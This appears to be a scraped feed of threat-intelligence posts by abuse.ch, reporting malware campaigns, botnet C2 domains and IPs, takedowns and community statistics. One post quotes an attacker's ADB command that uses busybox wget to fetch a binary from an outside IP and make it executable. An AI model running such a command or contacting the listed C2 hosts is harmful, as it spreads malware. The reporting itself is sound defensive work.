abuse-ch.bsky.social @abuse-ch.bsky.social · 24/09/2026Did you know that if you run Cowrie SSH and Telnet honeypot 🍯🐝, you can automatically submit malicious URLs caught by it to URLhaus 💡? If you aren't running a Cowrie honeypot yet, you may want to check it out: Project website: 🖥️ cowrie.org GitHub repository: 🖱️ github.com/cowrie/cowrie 020
abuse-ch.bsky.social @abuse-ch.bsky.social · 17/09/2026A couple of months in and the Community Hub is thriving 🤩 ... 36,441 contributions across all platforms in the last 30 days (+30.8%) 🔥🔥🔥 @geenensp 🥇 on URLhaus (78-month streak!!) @TheRavenFile 🥇 on ThreatFox @whack_sh 🥇 on MalwareBazaar Go see the full Top10 leaderboards 💛 👉 community.abuse.ch 010
abuse-ch.bsky.social @abuse-ch.bsky.social · 14/09/2026We recently sinkholed a DDoS #botnet of 200,000 compromised Android TV boxes infected with #CECbot malware 🕵️♀️. Shortly after, the threat actor responded by registering a rather specific botnet C2 domain 📡 spamhaushackers .at 231
abuse-ch.bsky.social @abuse-ch.bsky.social · 09/09/2026🚨 ANNOUNCEMENT FOR TOP CONTRIBUTORS! 🚨 We’ve been working on something huge and the cat 🐈️ is finally out of the bag 👀 ... we’ve officially partnered with Modat to give FREE Magnify licenses to our top contributors! 🎉🔥 120
abuse-ch.bsky.social @abuse-ch.bsky.social · 02/09/2026#BoratRAT spreading using similar tactics as #ClickFix 👇 1️⃣ Fake Microsoft Security Verification 🔑 leading to malicious PowerShell execution 🖱️ 2️⃣ Command triggers a DNS TXT request to recapture-robot .today 🌐 to obtain a PowerShell script 📜 3️⃣ Script drops payload, infecting host with BoratRAT 💻 100
abuse-ch.bsky.social @abuse-ch.bsky.social · 24/08/2026Overlord RAT 🔌 dropped by Amadey loader 🔥 Botnet C2 server: mypamella .xyz ➡️ NameSilo 🇺🇸 136.175.82.88:443 ➡️ 2ETELECOM🇧🇬 Payload is bulletproof hosted 🛡️at Omegatech LTD 🇳🇱 🌐 urlhaus.abuse.ch/url/3906755/ 📄 Malware sample: bazaar.abuse.ch/sample/ac1f8...bazaar.abuse.chMalwareBazaar - file (OverlordRAT)file has been detected as OverlordRAT by MalwareBazaar 110
abuse-ch.bsky.social @abuse-ch.bsky.social · 19/08/2026NeedleStealer 🪡🪝 written in Go ⤵️ 🔎 HTTP user agents observed: User-Agent: Loader-cli/v1 user-agent: Go-http-client/2.0 📡 Botnet C2s, all behind Cloudflare CDN: woolvilli .com/api/v2 allremdeskriki .com/api/v2 dubl1allremriki .com/api/v2 dubl2allremriki .com/api/v2 110
abuse-ch.bsky.social @abuse-ch.bsky.social · 18/08/2026We identified a new malware called #HypeAgent which acts as information stealer & loader. It is dominantly spread through malspam 📧, first observed on August 1, 2026 🔭👀 Key Capabilities ⤵️ 🕵️ Stealer & Loader: Supports 200+ commands; drops/executes payloads, including crypto miners 💸 130
abuse-ch.bsky.social @abuse-ch.bsky.social · 12/08/2026StealC C2s dropping OverlordRAT, using CloudFlare and Microsoft look-a-like domains 👁️ 🌐 cloud-flare-authenticator .link 🌐 cloud-flare-authenticator .click 🌐 update-microsoft-data .services 📡 89.34.90.45:443 OverlordRAT #botnet C2 server ⤵️ 🌐 download-windows-update .live 📡 151.243.113.94:5173 110
abuse-ch.bsky.social @abuse-ch.bsky.social · 11/08/2026Over the past days, active #malspam campaigns targeting LatAm users 🇦🇷🇧🇷🇲🇽 have been delivering the Grandoreiro banking trojan 🏦💰 📧 Email ➔ 📜 JS file ➔ 📑 Fake PDF download Final payload is hosted on MediaFire 🔥 free file hosting 100
abuse-ch.bsky.social @abuse-ch.bsky.social · 08/08/2026Rogue #ScreenConnect RMM cluster using a fake @coldcardwallet.bsky.social domain to lure crypto wallet owners 💰 into downloading a fake DocuSign MSI which drops ScreenConnect 🖱️🖥️ ⛓️ Attack Chain: Threat actor domain ➡️ GitHub repo ➡️ ScreenConnect 121
abuse-ch.bsky.social @abuse-ch.bsky.social · 30/07/2026📢 SERVICE UPDATE | As you may have noticed, we've experienced some downtime recently which was largely caused by a small number of users exceeding our Fair Use Policy. To protect platform stability and ensure fair access for everyone as our user base grows, we are introducing API rate limits. 1/2 110
abuse-ch.bsky.social @abuse-ch.bsky.social · 28/07/2026It's here!! The @abuse_ch #CommunityHub is LIVE 🔥🔥🔥 Every day, this community shares data that helps take down malicious infrastructure and now you can see the scale of it, all in one place. The Hub gives you a live view of: 101
abuse-ch.bsky.social @abuse-ch.bsky.social · 27/07/2026JackSkid malware spreading from 46.151.178.13 (SINOWORLDWIDE 🇳🇱) on exposed devices running Android Debug Bridge (ADB) ⤵️ ADB command: ⚙️ shell:busybox wget 94.154.0.43 .48/rebirth.arm7 -O /data/local/tmp/com.supercell.clashroyal; chmod 777 [...]urlhaus.abuse.chURLhaus - 94.154.43.48Malware distribution URLs hosted on 94.154.43.48 110
abuse-ch.bsky.social @abuse-ch.bsky.social · 23/07/2026Interesting unlabeled malware sample shared by our friend smica83, apparently targeting UA users 🇺🇦🕵️ The malware sample: 1️⃣ Obtains the DNS A record of ns2.theendlessweb .com 2️⃣ Queries directly the DNS A record (207.90.251 .10) for the DNS TXT record of sni13.docsmanagement.endl .site 100
abuse-ch.bsky.social @abuse-ch.bsky.social · 01/07/2026Something new is coming for abuse.ch contributors... watch this space! 👀 #ComingSoon #CommunityHub #SharingIsCaring 😻🥇💛 011
abuse-ch.bsky.social @abuse-ch.bsky.social · 22/06/2026Our platforms were recently targeted by a large-scale web scraping operation originating from devices that are apparently participating in residential proxy networks 🏘️ 🖥️ . The vast majority of these requests were successfully blocked by our existing mitigations 🛑 . 171
abuse-ch.bsky.social @abuse-ch.bsky.social · 09/06/2026Botnet C2 tied to an unidentified #malware family trying to hide as FortiGate device 😜 🌐 Domain: az2030port.duckdns .org 📡 C2: 178.16.55.28:2030 ➡️ Omegatech LTD 🇳🇱 🔐 SSL certificate: FortiGate, O=Fortinet Ltd. Corresponding malware samples ⤵️ hunting.abuse.ch/hunt/6a285c8... 020
abuse-ch.bsky.social @abuse-ch.bsky.social · 06/05/2026My favorite Remus botnet C2 domain so far 😄 havelbeenpwned .net ⤵️ NICENIC INTERNATIONAL🇨🇳 103.211.219.238:4219⤵️ AS394695 PUBLIC-DOMAIN-REGISTRY 🇮🇳 Malware sample: bazaar.abuse.ch/sample/75fce... More #Remnus IOCs available on ThreatFox 🦊 threatfox.abuse.ch/browse/malwa... /cc @troyhunt.com 063
abuse-ch.bsky.social @abuse-ch.bsky.social · 17/04/2026Malspam 📧 targeting Spanish users 🇪🇸 Email ➡️ geo filter ➡️ mediafire ➡️ iso ➡️ vbs 1st stage - geo filter 🛑 vmi3228488.contaboserver .net Contabo 🇩🇪 2nd stage - payload 📄 🌐 urlhaus.abuse.ch/url/3824487/ Dropped iso: bazaar.abuse.ch/sample/faaa4... Botnet C2: 📡 54.197.208.68 Amazon 🇺🇸 000
abuse-ch.bsky.social @abuse-ch.bsky.social · 26/02/2026SparkRAT ➡️ ChromeSetup.msi ➡️ FUD 🔥 msftconnecttest .xyz ⤵️ Creation Date: 2024-12-02 ⤵️ After more than a year, this domain still has a detection rate of 1/93 🤯 Pointing to ⤵️ 154.31.222.217:443 ➡️ DControl Chinese? 🇨🇳 lang="zh-cn" Malware sample: bazaar.abuse.ch/sample/91a29...bazaar.abuse.chMalwareBazaar - ChromeSetup.msi (SparkRAT)ChromeSetup.msi has been detected as SparkRAT by MalwareBazaar 000
abuse-ch.bsky.social @abuse-ch.bsky.social · 25/02/2026Proofpoint recently identified a fake RMM (Remote Monitoring and Management Tool) called #TrustConnect and #DocConnect🔎💻 Pivoting the threat in our collection reveals that the threat actors spread the same malware under additional names, including: ➡️SoftConnect ➡️HardConnect ➡️AxisControl 120
abuse-ch.bsky.social @abuse-ch.bsky.social · 23/02/2026Rogue #ScreenConnect RMM 🕵️♂️ Botnet C2: 📡 no.windowupdateservice .com 📡 relay.windowupdateservice .com 📡193.26.115.51:8041 Payload delivery URL: 🌐 urlhaus.abuse.ch/url/3782937/ Malware sample 📄: bazaar.abuse.ch/sample/77dc5... More ScreenConnect RMM IOCs ⤵️ threatfox.abuse.ch/browse/tag/S... 000
abuse-ch.bsky.social @abuse-ch.bsky.social · 02/02/2026Yet another RAT in town: RemoteX🖥️🖱️ 🪲 Dropped by Amadey 📃 Written in Golang 💻 Uses HKCU\...\CurrentVersion\Run\RemoteX for persitence (lame 🚽) 🌐 Uses WebSocket for C2 communication 🕵️♂️ Unauthenticated RAT admin panel 🤡 Botnet C2: 📡 109.107.168.147:80 (Partner Hosting LTD 🇬🇧) 100
abuse-ch.bsky.social @abuse-ch.bsky.social · 30/01/2026Xillen Stealer 🎣, heavily dropped by Amadey 🔥 Botnet C2: goldenring[.]live/api/logs/check "Invisible. Undetectedable. Unstopable." 🤡 👉 github.com/BengaminButt... Samples ⤵️ bazaar.abuse.ch/browse/signa... Additional IOCs on ThreatFox 🦊 threatfox.abuse.ch/browse/tag/X... 000
Reposted by @abuse-ch.bsky.socialPIVOTcon @pivotcon.bsky.social · 20/01/2026Thank you @spamhaustech.bsky.social & @abuse-ch.bsky.social for being #PIVOTcon26 Silver Sponsor 🎉 Read more about alliance: abuse.ch & spamhaus.com This alliance empowers the largest independently crowdsourced intelligence of tracked malware and botnets pivotcon.org/sponsors #CTI #ThreatIntel 065
abuse-ch.bsky.social @abuse-ch.bsky.social · 16/01/2026Brazillian banker 🇧🇷 caught by @johnk3r 🎣 GHOST panel 🧐 007consultoriafinanceira .net 83.229.17.124:80 Clouvider 🇺🇸 Payload delivery URL: 🌐https://urlhaus.abuse.ch/url/3759148/ Malware sample (MSI): ⚙️https://bazaar.abuse.ch/sample/2cbafc607c5d38a891ab89799f98b6b754b519706eb6597e4c4f2d4f6fc5db21/ 000
abuse-ch.bsky.social @abuse-ch.bsky.social · 06/01/2026Malspam sent from Microsoft Outlook that is spreading #LogMeIn GoToResolve RMM, enabling threat actors to access the victim's machine from remote 💻🔍🕵️ IOCs: 📡 adwestmailcenter .com ➡️ Landing page 📡 insightme .im ➡️ fake PDF download 100
abuse-ch.bsky.social @abuse-ch.bsky.social · 23/12/2025CHICXULUB IMPACT 💥 Botnet C2 URLs: 📡 turbokent .name/api/initialize 📡 turbokent .name/api/status Sponsoring domain registrar: NICENIC 🇭🇰 Malware sample 📄: bazaar.abuse.ch/sample/c32e1... 011
abuse-ch.bsky.social @abuse-ch.bsky.social · 18/12/2025New Stealer in town: SantaStealer 🎅🎄 Botnet C2s ➡️all hosted at AS399486 VIRTUO 🇨🇦: 📡31.57.38.119:6767 📡31.57.38.244:6767 📡80.76.49.114:6767 Stealer admin panel (via @darkwebinformer.com 💪): 🕵️ stealer. su Artifacts 💻: C:\tempLog\Clipboard.txt %LocalAppData%\Temp\passwordslog.txt 120
abuse-ch.bsky.social @abuse-ch.bsky.social · 16/12/2025Love letter ❤️ from a threat actor 🕵️exploiting React2Shell vulnerability (CVE-2025-55182) to spread #Mirai malware ⤵️ fuckoffurlhaus 😂 Payload URLs: 🌐 urlhaus.abuse.ch/host/45.153.... Mirai botnet C2s: 📡 marvisxoxo .st (ISTanCo 🇷🇸) 📡 45.156.87 .231:23789 (AS51396 PFCLOUD 🇩🇪) 141
abuse-ch.bsky.social @abuse-ch.bsky.social · 15/12/2025Unknown malware using WebSockets for botnet command&control, spreading through #ClickFix ⤵️ 🖱️ClickFix -> 📃VBS -> ⚙️MSI Payload delivery host: 🌐https://urlhaus.abuse.ch/host/103.27.157.60/ Malware sample 🤖: bazaar.abuse.ch/sample/4d8e5... Botnet C2 domains: 📡w2li .xyz 📡w2socks .xyz 111
abuse-ch.bsky.social @abuse-ch.bsky.social · 10/12/2025Exploitation of recent React RCE vul (CVE-2025-55182 - #React2Shell) leading to #Mirai infection ⤵️ Botnet Mirai C2 domains 📡: fuckphillipthegerman .ru Botnet Mirai C2 servers , all hosted at FORTIS 🇷🇺: 138.124.72.251:52896 138.124.69.154:60328 5.144.176.19:60328 110
abuse-ch.bsky.social @abuse-ch.bsky.social · 08/12/2025MaksRAT HKCU\Software\Microsoft\Windows\CurrentVersion\Run\javacom Botnet C2s 📡 104.198.24 .41:6656 avocado .gay www.foldacces .online www.makslove .xyz www.mavenrat .xyz www.blackprofit .online Sample shared by @smica83 💪 bazaar.abuse.ch/sample/88310... IOCs threatfox.abuse.ch/browse/tag/M... 000
abuse-ch.bsky.social @abuse-ch.bsky.social · 05/12/2025Mirai campaign spreading through 213.209.143.85 (Railnet 🇳🇱), messing around with the victim's system iptables 🤔 Mirai botnet C2 domain: womp.datasurge .vip (NameCheap 🇺🇸) Mirai botnet C2 server: 176.65.148.57:6969 (Pfcloud 🇩🇪) Payload URL: 🌐 urlhaus.abuse.ch/url/3725743/ 100
abuse-ch.bsky.social @abuse-ch.bsky.social · 04/12/2025Mirai botnet #zerobot spreading through 172.86.123.179 (cloudzy 🇦🇪) ⤵️ Mirai botnet C2 domain: 0bot.qzz .io (Gandi SAS 🇫🇷) Mirai botnet C2 server: 140.233.190.96:69 (Internet Magnate 🇿🇦) Payload URLs: 🌐 urlhaus.abuse.ch/host/172.86.... Mirai malware sample: 🤖 bazaar.abuse.ch/sample/9f64e... 100
abuse-ch.bsky.social @abuse-ch.bsky.social · 03/12/2025🎉 Massive shout out to URLhaus Top Contributor “geenensp” First seen April 13th 2020 and since then, they’ve shared an unbelievable 844,345 malware URLs!! 😮 Over the last 30 days, they have shared 8,902 URLs, firmly securing their position at the top of the leaderboard 💪 ⤵️ 100
abuse-ch.bsky.social @abuse-ch.bsky.social · 27/11/2025We’ve identified an interesting malware family 🔍, which we’ve named #GrokPy due to its use of a Grok LLM model 🤖 to solve and subsequently bypass CAPTCHAs 🔥 The malware gets dropped by #Amadey and: 131
abuse-ch.bsky.social @abuse-ch.bsky.social · 19/11/2025Yet another new stealer in town: #ArkanixStealer 🔥 %AppData%\Arkanix_lol\history.json %AppData%\Arkanix_lol\system_info.json %AppData%\Arkanix_lol\screenshot_monitor_1.png Akranix botnet C2: 📡 arkanix .pw/api/session/create 📡 arkanix .pw/delivery 📡 arkanix .pw/api/discord-injection/template 121
abuse-ch.bsky.social @abuse-ch.bsky.social · 16/11/2025Potential new stealer dropped by #Amadey 🤖🔍Who can name it? ⤵️ 👉 hunting.abuse.ch/hunt/6919ec1... Botnet C2 domains: 📡defender-temeerty .sbs 📡telemetry-defender .lol Botnet C2 server: 🛑185.100.157.69:443 (Partner Hosting 🇬🇧) Malware sample: 📄 bazaar.abuse.ch/sample/903cd... 100
abuse-ch.bsky.social @abuse-ch.bsky.social · 13/11/2025#OpEndgame 📣: We assisted in the takedown of infrastructure associated with #Rhadamanthys and share a full list of botnet C2s on ThreatFox 🦊 Full list of Rhadamanthys botnet C2s: 📡 threatfox.abuse.ch/browse/tag/O... Europol press release: 🚨 www.europol.europa.eu/media-press/... 062
abuse-ch.bsky.social @abuse-ch.bsky.social · 11/11/2025Over the past 30 days, our community shared 27,165 new #IOCs on ThreatFox 🦊 — an 18% increase from the previous month. 👏 Huge shoutout to Juroots, our top contributor with 2,746 IOCs submitted. 💀 The most-shared malware family (or in this case framework)? Clearfake, with 2,817 IOCs reported. ⤵️ 110
abuse-ch.bsky.social @abuse-ch.bsky.social · 05/11/2025🎉 Thanks to our AMAZING community, MalwareBazaar has reached a significant milestone - over 1 MILLION malware samples shared!! We simply couldn't achieve this without the efforts of our contributors and we want to say a massive THANK YOU 🙏🙏 #milestone #community #grateful #sharingiscaring 😻 021
abuse-ch.bsky.social @abuse-ch.bsky.social · 03/11/2025Interesting bash script, fully undetected (FUD) 🔥. It conducts various modifications on Linux based systems ⚙️ and uses iptables to forward certain ports to a C2 🔀: 45.156.87.37 Malicious bash script: 📜https://bazaar.abuse.ch/sample/27e2a9abfeb5f72746931dff55cd21b6631bab3aa13d8a1cb67c9319d8692229/ 010
abuse-ch.bsky.social @abuse-ch.bsky.social · 17/10/2025Over the last 30 days URLhaus sent out 41,270 abuse reports to hosting providers and network owners - that's up +48.88% on the previous month! 📈 That’s all you. That’s the power of our #community🤘 #AmazingWork #SharingIsCaring 041
abuse-ch.bsky.social @abuse-ch.bsky.social · 10/10/2025Looks like this #Mirai threat actor is a BIG fan of our URLhaus platform 😜 👉 hXXp://45.141.215.196/FuckYou0urlhaus0abuse0ch/ We thought we'd send a little love back to the threat actor... their server’s been taken down, and their #botnet C2 domain is now sinkholed. 😘 ⤵️ 130
abuse-ch.bsky.social @abuse-ch.bsky.social · 06/10/2025📣 Big thanks to MalwareBazaar Top Contributor "JAMESWT_WT" 🙇 First seen: 30 March 2020 and since then, they’ve shared 45,994 malware samples. In the last 30 days alone, they have dropped 1,472 new samples, that’s +30% ⬆️ from the previous month, with 631 samples shared on September 30th. 🔥🔥 131
abuse-ch.bsky.social @abuse-ch.bsky.social · 30/09/2025Over the last 30 days, the community shared 26,575 #IOCs on ThreatFox 🦊. That's a 83% jump on the previous month. 🚀 And topping the charts: XtremeRAT, with 6,640 IOCs 💀 Find more ThreatFox statistics here: 👉 threatfox.abuse.ch/statistics #SharingIsCaring #XtremeRAT #Malware #ThreatIntel 021
abuse-ch.bsky.social @abuse-ch.bsky.social · 26/09/2025🔥 "Kamasers" is a DDoS botnet, first seen in August, and dropped by Amadey. The malware name was adapted from the User-Agent used during network communication with the C2 server. The first time we encountered it, the sample was written in Golang language. ⤵️ 120
abuse-ch.bsky.social @abuse-ch.bsky.social · 02/09/2025We’ve just rolled out two new features on MalwareBazaar 🆕 👀 ➡️ OpenTIP integration: Results from @kasperskylab.bsky.social OpenTIP are now included for all samples on MalwareBazaar, available via both, UI and API 🖥️ 110